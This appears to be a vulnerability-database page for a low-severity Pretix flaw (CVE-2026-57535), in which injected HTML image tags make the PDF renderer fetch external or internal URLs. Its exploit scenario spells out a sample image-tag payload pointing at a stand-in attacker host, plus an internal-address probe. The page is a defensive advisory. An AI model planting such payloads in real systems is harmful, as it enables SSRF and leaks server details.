Skip to main content

Pretix CVE-2026-57535

| EUVDEUVD-2026-39420 LOW
Basic XSS (CWE-80)
2026-06-25 rami.io GHSA-gjw6-qpff-pf5x
2.1
CVSS 4.0 · Vendor: rami.io

Severity by source

Vendor (rami.io) PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.1 MEDIUM

Network vector, low privileges required, user interaction needed to trigger PDF generation, scope changes due to SSRF reaching other systems, confidentiality-only impact with no integrity or availability effect.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
4.0 AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N

Primary rating from Vendor (rami.io).

CVSS VectorVendor: rami.io

CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

2
Patch available
Jun 25, 2026 - 16:03 EUVD
Analysis Generated
Jun 25, 2026 - 15:21 vuln.today

DescriptionCVE.org

Content injected to PDF rendering contexts could, in many places, include HTML content including <img> tags. If the src attribute of these images pointed to an URL, the PDF rendering engine would download the image from that place and display it, thereby leaking information about the rendering server and possibly creating an SSRF vector in the local network.

AnalysisAI

HTML injection into server-side PDF rendering contexts in Pretix enables low-privileged authenticated users to embed external image references that trigger outbound HTTP requests from the rendering engine, leaking the server's network identity and creating an SSRF vector against internal network services. The CVSS 4.0 score of 2.1 reflects genuinely low severity - exploitation requires authentication, specific content reaching PDF rendering paths, and passive user interaction to trigger PDF generation. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate to Pretix with low-privileged credentials
Delivery
Inject external `<img src>` tag into PDF-rendered input field
Exploit
Wait for server-side PDF generation to trigger (passive interaction)
Execution
PDF rendering engine issues outbound HTTP request
Persist
Attacker server logs Pretix host IP and headers
Impact
Redirect src to internal RFC 1918 address to probe internal services

Vulnerability AssessmentAI

Exploitation Exploitation requires a valid low-privileged authenticated account on the target Pretix instance (PR:L per CVSS 4.0 vector - unauthenticated access is not sufficient). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 base score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L positions this as a low-severity finding. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A low-privileged authenticated Pretix user injects `<img src='https://attacker.example/collect'>` into a user-controlled field that is later incorporated into a server-rendered PDF - such as an order note, custom ticket field, or template input. When a server-side process or administrator triggers PDF generation, the rendering engine makes an outbound HTTP request to the attacker's server, disclosing the Pretix host's external IP address, and the same mechanism can be redirected to an internal service address (e.g., `http://192.168.1.1/admin`) to probe internal network topology. …
Remediation Upgrade Pretix to version 2026.5.2, as documented in the vendor release announcement at https://pretix.eu/about/en/blog/20260625-release-2026-5-2/. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Pretix

View all
CVE-2024-27447 CRITICAL
9.8 Feb 26

pretix before 2024.1.1 mishandles file validation. Rated critical severity (CVSS 9.8), this vulnerability is remotely ex

CVE-2026-57532 HIGH
8.8 Jun 25

Stored cross-site scripting in Pretix's PDF ticket and badge layout editor allows one backend user to inject JavaScript

CVE-2023-44464 HIGH
7.8 Sep 29

pretix before 2023.7.2 allows Pillow to parse EPS files. Rated high severity (CVSS 7.8), this vulnerability is no authen

CVE-2026-13602 HIGH
7.7 Jul 01

Privilege escalation to full account takeover in pretix (open-source event ticketing) and its payment integration plugin

CVE-2023-27891 HIGH
7.5 Mar 06

rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. Rated high severity (CVSS

CVE-2024-8113 HIGH
7.2 Aug 23

Stored XSS in organizer and event settings of pretix up to 2024.7.0 allows malicious event organizers to inject HTML tag

CVE-2026-2451 MEDIUM
6.5 Feb 16

Information disclosure in Pretix email template processing allows authenticated backend users to extract sensitive syste

CVE-2026-2452 MEDIUM
6.5 Feb 16

Information disclosure in Pretix email template processing allows authenticated backend users to extract sensitive syste

CVE-2026-2415 MEDIUM
5.9 Feb 16

Pretix email template placeholder injection enables authenticated backend users to extract sensitive system information

CVE-2026-5600 MEDIUM
5.5 Apr 08

Pretix 2025 and 2026 versions contain an API endpoint authorization bypass that returns all check-in events for an organ

CVE-2026-13225 MEDIUM
5.3 Jun 25

HTML injection on pretix's individual ticket confirmation page allows unsanitized email address content to execute arbit

CVE-2023-44463 MEDIUM
5.3 Oct 02

An issue was discovered in pretix before 2023.7.1. Rated medium severity (CVSS 5.3), this vulnerability is remotely expl

Share

CVE-2026-57535 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy